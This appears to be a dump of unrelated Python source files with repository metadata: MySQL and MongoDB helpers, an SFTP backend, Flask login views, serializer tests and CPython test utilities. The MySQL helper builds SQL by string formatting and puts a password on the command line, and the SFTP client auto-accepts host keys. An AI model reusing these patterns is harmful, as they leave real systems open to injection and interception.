        :type colnameValueDict: Dict<String,Any>
        '''
        colNames, colValues = zip(*colnameValueDict.items())
        cursor = self.connection.cursor()
        try:
            cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues))
            cursor.execute(cmd)
            self.connection.commit()
        finally:
            cursor.close()

    def bulkInsert(self, tblName, colNameTuple, valueTupleArray):
        '''
        Inserts large number of rows into given table. Strategy: write
        the values to a temp file, then generate a LOAD INFILE LOCAL
        MySQL command. Execute that command via subprocess.call().
        Using a cursor.execute() fails with error 'LOAD DATA LOCAL
        is not supported in this MySQL version...' even though MySQL
        is set up to allow the op (load-infile=1 for both mysql and
        mysqld in my.cnf).

        :param tblName: table into which to insert
        :type tblName: string
        :param colNameTuple: tuple containing column names in proper order, i.e. \
        corresponding to valueTupleArray orders.
        :type colNameTuple: (str[,str[...]])
        :param valueTupleArray: array of n-tuples, which hold the values. Order of\
        values must corresond to order of column names in colNameTuple.
        :type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]])
        '''
        # Fix: open in text mode ('w') so writing str rows works on Python 3
        # (the default binary mode only accepts bytes).
        tmpCSVFile = tempfile.NamedTemporaryFile(mode='w', dir='/tmp', prefix='userCountryTmp', suffix='.csv')
        try:
            for valueTuple in valueTupleArray:
                tmpCSVFile.write(','.join(valueTuple) + '\n')
            # Fix: flush buffered rows so the mysql subprocess sees the whole file.
            tmpCSVFile.flush()
            # Remove quotes from the values inside the colNameTuple's:
            mySQLColNameList = re.sub("'", "", str(colNameTuple))
            mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\
                       (self.db, tmpCSVFile.name, tblName, mySQLColNameList)
            subprocess.call(['mysql', '-u', self.user, '-p%s' % self.pwd, '-e', mySQLCmd])
        finally:
            # Closing the NamedTemporaryFile also deletes it.
            tmpCSVFile.close()

    def update(self, tblName, colName, newVal, fromCondition=None):
        '''
        Update one column with a new value.

        :param tblName: name of table in which update is to occur
        :type tblName: String
        :param colName: column whose value is to be changed
        :type colName: String
        :param newVal: value acceptable to MySQL for the given column
        :type newVal: type acceptable to MySQL for the given column
        :param fromCondition: optionally condition that selects which rows to update.\
        if None, the named column in all rows are updated to\
        the given value. Syntax must conform to what may be in\
        a MySQL FROM clause (don't include the 'FROM' keyword)
        :type fromCondition: String
        '''
        cursor = self.connection.cursor()
        try:
            if fromCondition is None:
                cmd = "UPDATE %s SET %s = '%s';" % (tblName, colName, newVal)
            else:
                cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName, colName, newVal, fromCondition)
            cursor.execute(cmd)
            self.connection.commit()
        finally:
            cursor.close()

    def ensureSQLTyping(self, colVals):
        '''
        Given a list of items, return a string that preserves
        MySQL typing. Example: (10, 'My Poem') ---> '10,"My Poem"'
        Note that ','.join(map(str,myList)) won't work:
        (10, 'My Poem') ---> '10, My Poem'

        :param colVals: list of column values destined for a MySQL table
        :type colVals: <any>
        '''
        resList = []
        for el in colVals:
            # Fix: 'basestring' is Python 2 only and raises NameError on
            # Python 3; str is the correct check here.
            if isinstance(el, str):
                resList.append('"%s"' % el)
            else:
                resList.append(el)
        return ','.join(map(str, resList))

    def query(self, queryStr):
        '''
        Query iterator. Given a query, return one result for each
        subsequent call.

        :param queryStr: query
        :type queryStr: String
        '''
        cursor = self.connection.cursor()
        # For if caller never exhausts the results by repeated calls:
        self.cursors.append(cursor)
        cursor.execute(queryStr)
        while True:
            nextRes = cursor.fetchone()
            if nextRes is None:
                cursor.close()
                return
            yield nextRes
| 40.461847
| 757
| 0.60794
| 1,195
| 10,075
| 5.121339
| 0.314644
| 0.032026
| 0.019608
| 0.02549
| 0.186438
| 0.156373
| 0.128758
| 0.112909
| 0.112909
| 0.096242
| 0
| 0.006105
| 0.300943
| 10,075
| 248
| 758
| 40.625
| 0.862843
| 0.504218
| 0
| 0.431373
| 0
| 0.019608
| 0.104526
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098039
| false
| 0.068627
| 0.039216
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13c974d988a5a072e9adfbe93d6a9ef5022a8ab3
| 1,712
|
py
|
Python
|
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
source/dump_query_results.py
|
CheyenneNS/metrics
|
cfeeac6d01d99679897a998b193d630ada169c61
|
[
"MIT"
] | null | null | null |
#!/usr/local/bin/python
import os
import mysql.connector as mysql
metrics_mysql_password = os.environ['METRICS_MYSQL_PWD']
sql_host = os.environ['SQL_HOST']
metrics = os.environ['QUERY_ON']
def dump_query_results():
    """
    This is a simple SQL table dump of a given query so we can supply users with custom tables.
    Note that the SQL query itself and column headers portion need to be changed if you want to change
    the query/results. Otherwise it is good to go.
    It can be called simply with the bin shell script.
    Read the README at the top level for an example.
    """
    # Connect to the metrics MySQL server.
    db_connection = mysql.connect(
        host=sql_host,
        user="metrics",
        passwd=metrics_mysql_password,
        database="metrics"
    )
    cursor = db_connection.cursor()
    cursor.execute("use " + metrics)
    # CHANGE QUERY HERE
    query = "select username, display_name, email, orcid, kb_internal_user, institution, country, signup_date, last_signin_date from user_info order by signup_date"
    # CHANGE COLUMN HEADERS HERE TO MATCH QUERY HEADERS
    print("username\tdisplay_name\temail\torcid\tkb_internal_user\tinstitution\tcountry\tsignup_date\tlast_signin_date")
    cursor.execute(query)
    # Emit each row tab-separated, rendering NULL columns as empty strings.
    for row in cursor:
        print("\t".join("" if value is None else str(value) for value in row))
    return 1
dump_query_results()
| 33.568627
| 164
| 0.675234
| 242
| 1,712
| 4.603306
| 0.512397
| 0.056553
| 0.02693
| 0.023339
| 0.055655
| 0.055655
| 0.055655
| 0.055655
| 0
| 0
| 0
| 0.003817
| 0.234813
| 1,712
| 50
| 165
| 34.24
| 0.846565
| 0.28271
| 0
| 0.066667
| 0
| 0.033333
| 0.261163
| 0.090143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0.066667
| 0.066667
| 0
| 0.133333
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13cbb884947e5c5ee43f164c1fde11e81811776b
| 4,399
|
py
|
Python
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 2
|
2018-05-08T03:13:49.000Z
|
2022-02-09T08:48:06.000Z
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 6
|
2019-02-06T19:12:09.000Z
|
2022-02-08T04:29:49.000Z
|
osaka/storage/sftp.py
|
riverma/osaka
|
f9ed386936500303c629d7213d91215085bcf346
|
[
"Apache-2.0"
] | 12
|
2018-04-08T12:58:29.000Z
|
2022-03-31T18:35:53.000Z
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import int
from future import standard_library
standard_library.install_aliases()
import os
import os.path
import stat
import urllib.parse
import paramiko
import traceback
import osaka.utils
"""
A backend used to handle stfp using parimiko
@author starchmd
"""
class SFTP(object):
    """
    SFTP handling for Osaka
    """

    def __init__(self, params=None):
        """
        Constructor

        @param params - optional configuration dict; honors the "keyfile" key
                        (path to an SSH private key used at connect time)
        """
        # Fix: the original used a mutable default argument (params={});
        # None is backward-compatible because params is only read here.
        if params is None:
            params = {}
        self.keyfile = params["keyfile"] if "keyfile" in params else None

    def connect(self, host=None, port=None, user=None, password=None, secure=False):
        """
        Connect to this storage medium. All data is parsed out of the url and may be None
        scheme:
        @param host - may be None, host to connect to
                      implementor must handle defaulting
        @param port - may be None, port to connect to
                      implementor must handle a None port
        @param user - may be None, user to connect as
                      implementor must handle a None user
        @param password - may be None, password to connect with
                          implementor must handle a None password
        """
        self.client = paramiko.client.SSHClient()
        # Auto-accept unknown host keys so first-time hosts do not fail.
        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.client.connect(
            host,
            port=22 if port is None else int(port),
            username=user,
            password=password,
            key_filename=self.keyfile,
            timeout=15,
        )
        self.sftp = self.client.open_sftp()

    @classmethod
    def getSchemes(clazz):
        """
        Returns a list of schemes this handler handles
        Note: handling the scheme of another handler produces unknown results
        @returns list of handled schemes
        """
        return ["sftp"]

    def put(self, path, url):
        """
        Put the given path to the given url
        @param path - local path of file/folder to put
        @param url - url to put file/folder to
        """
        rpath = urllib.parse.urlparse(url).path.lstrip("/")
        print("\n\n\n\nUploading:", path)
        if not os.path.isdir(path):
            print("As file")
            # Ensure the remote parent directory exists (IOError = it already does).
            try:
                self.sftp.mkdir(os.path.dirname(rpath))
            except IOError:
                pass
            dest = rpath
            # If the remote target is an existing directory, upload into it.
            try:
                if stat.S_ISDIR(self.sftp.stat(rpath).st_mode) != 0:
                    dest = os.path.join(rpath, os.path.basename(path))
            except Exception:
                # Fix: narrowed from a bare except; stat fails when the
                # remote path does not exist yet, which is fine.
                pass
            return self.upload(path, dest)
        print("As Dir")
        try:
            self.sftp.mkdir(rpath)
        except IOError:
            pass
        # Mirror the local directory tree on the remote side, file by file.
        for dirpath, dirname, filenames in os.walk(path):
            extra = os.path.relpath(dirpath, os.path.dirname(path))
            try:
                self.sftp.mkdir(os.path.join(rpath, extra))
            except IOError:
                pass
            for filename in filenames:
                self.upload(
                    os.path.join(dirpath, filename),
                    os.path.join(rpath, extra, filename),
                )

    def upload(self, path, rpath):
        """
        Uploads a file to remote path
        @param path - path to upload
        @param rpath - remote path to upload to
        """
        self.sftp.put(path, rpath)
        return True

    def get(self, url, path):
        """
        Get the url (file/folder) to local path
        @param url - url to get file/folder from
        @param path - path to place fetched files
        """
        rpath = urllib.parse.urlparse(url).path
        try:
            self.sftp.get(rpath, path)
        except Exception as e:
            osaka.utils.LOGGER.warning(
                "Encountered exception: {}\n{}".format(e, traceback.format_exc())
            )
            raise osaka.utils.OsakaFileNotFound("File {} doesn't exist.".format(url))

    def rm(self, url):
        """
        Remove the item
        @param url - url to remove
        """
        rpath = urllib.parse.urlparse(url).path
        self.sftp.remove(rpath)

    def close(self):
        """
        Close this connection
        """
        self.client.close()
| 30.130137
| 90
| 0.562855
| 519
| 4,399
| 4.703276
| 0.310212
| 0.02458
| 0.032773
| 0.027038
| 0.119623
| 0.082343
| 0
| 0
| 0
| 0
| 0
| 0.001745
| 0.348716
| 4,399
| 145
| 91
| 30.337931
| 0.850262
| 0.246874
| 0
| 0.17284
| 0
| 0
| 0.034852
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098765
| false
| 0.074074
| 0.160494
| 0
| 0.308642
| 0.049383
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13d760267b20f874fc4b087de72759e81f401445
| 6,123
|
py
|
Python
|
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
servicedirectory/src/sd-api/users/tests/tests_serializers.py
|
ealogar/servicedirectory
|
fb4f4bfa8b499b93c03af589ef2f34c08a830b17
|
[
"Apache-2.0"
] | null | null | null |
'''
(c) Copyright 2013 Telefonica, I+D. Printed in Spain (Europe). All Rights
Reserved.
The copyright to the software program(s) is property of Telefonica I+D.
The program(s) may be used and or copied only with the express written
consent of Telefonica I+D or in accordance with the terms and conditions
stipulated in the agreement/contract under which the program(s) have
been supplied.
'''
from unittest import TestCase
from mock import MagicMock, patch
from commons.json_schema_validator.schema_reader import SchemaField
from commons.json_schema_validator.schema_reader import SchemaReader
from users.serializers import UserCollectionSerializer
class UserSerializerTests(TestCase):
def setUp(self):
    """Patch SchemaReader so serializer tests run against a fixed schema
    (username/password strings required, is_admin boolean defaulting False)
    instead of reading real schema files."""
    super(UserSerializerTests, self).setUp()
    mock_schema_instance = MagicMock(name='mock_schema_instance')
    mock_schema_instance.return_value = [
        SchemaField(name='username', field_type='string', required=True),
        SchemaField(name='password', field_type='string', required=True),
        SchemaField(name='is_admin', field_type='boolean', required=True, default=False)
    ]
    # NOTE(review): mock_get_schema_fields is built but never installed;
    # the patch below uses mock_schema_instance directly.
    mock_get_schema_fields = MagicMock(name='mock_get_schema')
    mock_get_schema_fields.return_value = mock_schema_instance
    # mock schema instance
    schema_reader = SchemaReader()
    self.patcher_validate = patch.object(schema_reader, 'validate_object')  # @UndefinedVariable
    self.patcher_schema = patch.object(schema_reader,  # @UndefinedVariable
                                       'get_schema_fields', mock_schema_instance)
    # Patchers stay active for the whole test; tearDown stops them.
    self.patcher_schema.start()
    self.patcher_validate.start()
def tearDown(self):
self.patcher_schema.stop()
self.patcher_validate.stop()
def test_deserialize_user_should_work(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass'})
self.assertEquals(True, serializer.is_valid(), "Serialization invalid")
def test_deserialize_user_invalid_is_admin_should_work(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'is_admin': 'si'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
def test_deserialize_user_empty_user_should_give_error_invalid(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': '', 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_null_user_should_give_required_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"required",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_large_user_ne_should_give_invalid_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'a' * 600, 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_with_invalid_origins_should_give_error(self):
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'origins': ["????"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['origins'][0],
'Invalid error message')
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'origins': [" tugo"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['origins'][0],
'Invalid error message')
def test_deserialize_user_with_invalid_classes_should_give_error(self):
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'classes': ["????"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['classes'][0],
'Invalid error message')
serializer = UserCollectionSerializer(data={'username': 'user', 'password': 'pass', 'classes': [" sms"]})
self.assertEquals(False, serializer.is_valid())
self.assertEquals(u"invalid",
serializer.errors['classes'][0],
'Invalid error message')
def test_deserialize_user_invalid_username_should_give_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'User.user', 'password': 'pass'})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['username'][0],
'Invalid error message')
def test_deserialize_user_invalid_is_admin_should_give_error(self):
# We need to do import here in order generic patches work
serializer = UserCollectionSerializer(data={'username': 'usera', 'password': 'pass', 'is_admin': 0})
self.assertEquals(False, serializer.is_valid(), "Serialization invalid")
self.assertEquals(u"invalid",
serializer.errors['is_admin'][0],
'Invalid error message')
| 52.784483
| 114
| 0.6634
| 654
| 6,123
| 6.022936
| 0.19419
| 0.081239
| 0.106118
| 0.116781
| 0.693069
| 0.687992
| 0.669713
| 0.648388
| 0.606245
| 0.567149
| 0
| 0.003606
| 0.230116
| 6,123
| 115
| 115
| 53.243478
| 0.83199
| 0.136534
| 0
| 0.421687
| 0
| 0
| 0.16926
| 0
| 0
| 0
| 0
| 0
| 0.240964
| 1
| 0.13253
| false
| 0.144578
| 0.060241
| 0
| 0.204819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13d7896d6d799cba6c0e766504d5f3eea5f2e531
| 3,124
|
py
|
Python
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 14
|
2019-10-13T07:38:04.000Z
|
2022-02-13T09:03:50.000Z
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 1
|
2019-10-13T07:35:13.000Z
|
2019-10-13T08:22:48.000Z
|
Web/notifyXAPI/app/src/users/views.py
|
abs0lut3pwn4g3/RootersCTF2019-challenges
|
397a6fad0b03e55541df06e5103172ae850cd4e5
|
[
"MIT"
] | 4
|
2019-10-13T08:21:43.000Z
|
2022-01-09T16:39:33.000Z
|
''' User views '''
from datetime import timedelta
from flask import request, jsonify, make_response, redirect, json, render_template
from flask_jwt_extended import (create_access_token, jwt_required)
from flask_restful import Resource
from flask_login import login_user, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError
from src import db, api
from .models import User
from .schemas import UserSchema
class UserLoginResource(Resource):
    """Login endpoint: serves the login page and authenticates users.

    JSON requests get a JWT back; form posts establish a browser session.
    """
    model = User
    schema = UserSchema
    def get(self):
        # Render the HTML login page for browser clients.
        return make_response(render_template('login.html'))
    def post(self):
        if request.json:
            # API path: authenticate and hand back a long-lived JWT.
            data = request.json
            user = self.model.query.filter(self.model.email == data['email']).first()
            if user and self.model.check_password(user, data['password']):
                expires = timedelta(days=365)
                # Serialize only the public fields before returning them.
                user = UserSchema(only=('id', 'email', 'is_admin')).dump(user).data
                return make_response(
                    jsonify({'id': user,
                             'authentication_token': create_access_token(identity=user['id'], expires_delta=expires)}), 200)
            else:
                return make_response(jsonify({"error": {"code": 400, "msg": "No such user/wrong password."}}), 400)
        else:
            # Browser path: form login that establishes a flask-login session.
            data = request.form
            user = self.model.query.filter(self.model.email == data['email']).first()
            if user and self.model.check_password(user, data['password']) and login_user(user):
                return make_response(redirect('/admin/', 302))
            else:
                # NOTE(review): redirect with a 403 status is unusual -- most
                # browsers will not follow it; confirm this is intended.
                return make_response(redirect('/api/v1/login', 403))
class UserRegisterResource(Resource):
    """Registration endpoint: creates a user and returns a JWT for it."""
    model = User
    schema = UserSchema
    def post(self):
        data = request.json
        if not data:
            return make_response(jsonify({'error': 'No data'}), 400)
        # Reject duplicate registrations by email.
        user = User.query.filter(User.email == data['email']).first()
        if user:
            return make_response(jsonify({'error': 'User already exists'}), 403)
        # Marshmallow-style load: returns (instance, errors).
        user, errors = self.schema().load(data)
        if errors:
            return make_response(jsonify(errors), 400)
        try:
            user.set_password(data['password'])
            db.session.add(user)
            db.session.commit()
        except (IntegrityError, InvalidRequestError) as e:
            print(e)
            # Roll back so the session stays usable for later requests.
            db.session.rollback()
            return make_response(jsonify(error={'code': 400 }), 400)
        expires = timedelta(days=365)
        return make_response(
            jsonify(created_user={'id': user.id,
                                  'user': self.schema(only=('id', 'email', 'is_admin')).dump(user).data,
                                  'authentication_token': create_access_token(identity=user.id,
                                                                              expires_delta=expires)}), 200)
# Register both endpoints on the shared Api instance.
api.add_resource(UserLoginResource, '/login/', endpoint='login')
api.add_resource(UserRegisterResource, '/register/', endpoint='register')
| 40.571429
| 124
| 0.588348
| 336
| 3,124
| 5.354167
| 0.28869
| 0.073374
| 0.100056
| 0.097276
| 0.367982
| 0.31851
| 0.264591
| 0.223457
| 0.190106
| 0.190106
| 0
| 0.018165
| 0.295134
| 3,124
| 77
| 125
| 40.571429
| 0.798819
| 0.003201
| 0
| 0.274194
| 0
| 0
| 0.08336
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048387
| false
| 0.064516
| 0.145161
| 0.016129
| 0.451613
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13e10f247a53a809b100dc05b97804f51f30b05a
| 463
|
py
|
Python
|
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | 6
|
2021-07-04T07:59:17.000Z
|
2021-07-04T14:41:00.000Z
|
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | null | null | null |
server/form/mongo.py
|
SRM-IST-KTR/ossmosis
|
06e375dfdd67f91286ffbcb13e04b6543585d8ad
|
[
"MIT"
] | 1
|
2022-02-15T13:31:46.000Z
|
2022-02-15T13:31:46.000Z
|
import os
from pymongo import MongoClient
from dotenv import load_dotenv
def database_entry(data):
    """Insert a single document into the 'users' collection.

    :param data: dict-like document to insert.
    :return: True on success, False on any failure (best-effort: errors are
             printed, not raised).
    """
    try:
        load_dotenv()
        mongo_string = os.getenv('MONGODB_AUTH_URI')
        # Use the client as a context manager so the connection pool is
        # closed on exit -- the original leaked the MongoClient.
        with MongoClient(mongo_string) as client:
            database = client[os.getenv('MONGODB_DB')]
            col = database['users']
            col.insert_one(data)
        return True
    except Exception as e:
        print(e)
        return False
if __name__ == "__main__":
    # Module is import-only; nothing to run directly.
    pass
| 21.045455
| 52
| 0.637149
| 56
| 463
| 4.964286
| 0.642857
| 0.071942
| 0.107914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.278618
| 463
| 21
| 53
| 22.047619
| 0.832335
| 0
| 0
| 0
| 0
| 0
| 0.084233
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0.058824
| 0.176471
| 0
| 0.352941
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
13efdb45818b7da3afae845201256a86d37c940d
| 4,302
|
py
|
Python
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 5
|
2017-08-25T04:31:30.000Z
|
2022-03-22T15:01:56.000Z
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 20
|
2021-03-25T12:52:42.000Z
|
2022-03-01T02:02:03.000Z
|
Lib/test/libregrtest/utils.py
|
oskomorokhov/cpython
|
c0e11a3ceb9427e09db4224f394c7789bf6deec5
|
[
"0BSD"
] | 3
|
2020-04-13T14:41:31.000Z
|
2022-03-02T18:56:32.000Z
|
import math
import os.path
import sys
import textwrap
from test import support
def format_duration(seconds):
    """Render a duration in seconds as a short human-readable string.

    At most two units are shown ('1 hour 2 min'); sub-second precision is
    kept only when seconds is the leading unit ('1.5 sec'); durations under
    one second come out as milliseconds ('42 ms').
    """
    total_ms = math.ceil(seconds * 1e3)
    whole_seconds, total_ms = divmod(total_ms, 1000)
    total_minutes, whole_seconds = divmod(whole_seconds, 60)
    total_hours, total_minutes = divmod(total_minutes, 60)

    pieces = []
    if total_hours:
        pieces.append('%s hour' % total_hours)
    if total_minutes:
        pieces.append('%s min' % total_minutes)
    if whole_seconds:
        if pieces:
            # A larger unit is already shown: drop the fraction.
            pieces.append('%s sec' % whole_seconds)
        else:
            # Seconds lead: keep one decimal of the millisecond remainder.
            pieces.append('%.1f sec' % (whole_seconds + total_ms / 1000))
    if not pieces:
        return '%s ms' % total_ms
    return ' '.join(pieces[:2])
def removepy(names):
    """Strip a trailing '.py' extension from each entry of *names*, in place."""
    if not names:
        return
    for position, fullname in enumerate(names):
        stem, extension = os.path.splitext(fullname)
        if extension == '.py':
            names[position] = stem
def count(n, word):
    """Return '<n> <word>' with a naive plural 's' whenever n != 1."""
    suffix = '' if n == 1 else 's'
    return "%d %s%s" % (n, word, suffix)
def printlist(x, width=70, indent=4, file=None):
    """Print the elements of iterable x to stdout.

    Optional arg width (default 70) is the maximum line length.
    Optional arg indent (default 4) is the number of blanks with which to
    begin each line.
    """
    pad = ' ' * indent
    # 'x' may be an unordered set or a '--random' list; sort for stable output.
    body = ' '.join(str(item) for item in sorted(x))
    wrapped = textwrap.fill(body, width,
                            initial_indent=pad, subsequent_indent=pad)
    print(wrapped, file=file)
def print_warning(msg):
    # Thin wrapper so callers in this package need not import test.support.
    support.print_warning(msg)
# Previous sys.unraisablehook; saved by setup_unraisable_hook() and chained
# to from regrtest_unraisable_hook().
orig_unraisablehook = None
def regrtest_unraisable_hook(unraisable):
    """Replacement unraisable hook: report on the real stderr, then chain."""
    global orig_unraisablehook
    support.environment_altered = True
    print_warning("Unraisable exception")
    old_stderr = sys.stderr
    try:
        # Bypass any stderr capturing installed by the running test.
        sys.stderr = sys.__stderr__
        orig_unraisablehook(unraisable)
    finally:
        sys.stderr = old_stderr
def setup_unraisable_hook():
    """Install regrtest_unraisable_hook, remembering the hook it replaces."""
    global orig_unraisablehook
    orig_unraisablehook = sys.unraisablehook
    sys.unraisablehook = regrtest_unraisable_hook
def clear_caches():
    """Flush interpreter-wide caches so each test starts from a clean slate."""
    # Clear the warnings registry, so they can be displayed again
    for mod in sys.modules.values():
        if hasattr(mod, '__warningregistry__'):
            del mod.__warningregistry__
    # Flush standard output, so that buffered data is sent to the OS and
    # associated Python objects are reclaimed.
    for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
        if stream is not None:
            stream.flush()
    # Per-module cache flushers. Each one runs only if its module is already
    # imported -- importing a module just to reset its cache would be wasted
    # work, so absent modules are skipped.
    flushers = (
        ('distutils.dir_util', lambda m: m._path_created.clear()),
        ('re', lambda m: m.purge()),
        ('_strptime', lambda m: m._regex_cache.clear()),
        ('urllib.parse', lambda m: m.clear_cache()),
        ('urllib.request', lambda m: m.urlcleanup()),
        ('linecache', lambda m: m.clearcache()),
        ('mimetypes', lambda m: m._default_mime_types()),
        ('filecmp', lambda m: m._cache.clear()),
        ('struct', lambda m: m._clearcache()),
        ('doctest', lambda m: setattr(m, 'master', None)),
        ('ctypes', lambda m: m._reset_cache()),
    )
    for module_name, flush in flushers:
        try:
            module = sys.modules[module_name]
        except KeyError:
            pass
        else:
            flush(module)
    # typing keeps a list of cleanup callables rather than a single cache.
    try:
        typing = sys.modules['typing']
    except KeyError:
        pass
    else:
        for f in typing._cleanups:
            f()
    support.gc_collect()
| 22.761905
| 75
| 0.600418
| 510
| 4,302
| 4.933333
| 0.35098
| 0.051669
| 0.085851
| 0.104928
| 0.022258
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009015
| 0.303812
| 4,302
| 188
| 76
| 22.882979
| 0.831052
| 0.125291
| 0
| 0.381295
| 0
| 0
| 0.051701
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.086331
| 0.035971
| 0
| 0.129496
| 0.035971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b93a3daf85b033d7039d8c3747eadb457802db6b
| 2,814
|
py
|
Python
|
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
ea4e378c8d9e530edadd4a3315fe9e8acc98460b
|
[
"Apache-2.0"
] | 2
|
2015-01-19T14:50:55.000Z
|
2015-01-28T12:45:59.000Z
|
GeneratePassword/generate_password_v2.py
|
OneScreenfulOfPython/screenfuls
|
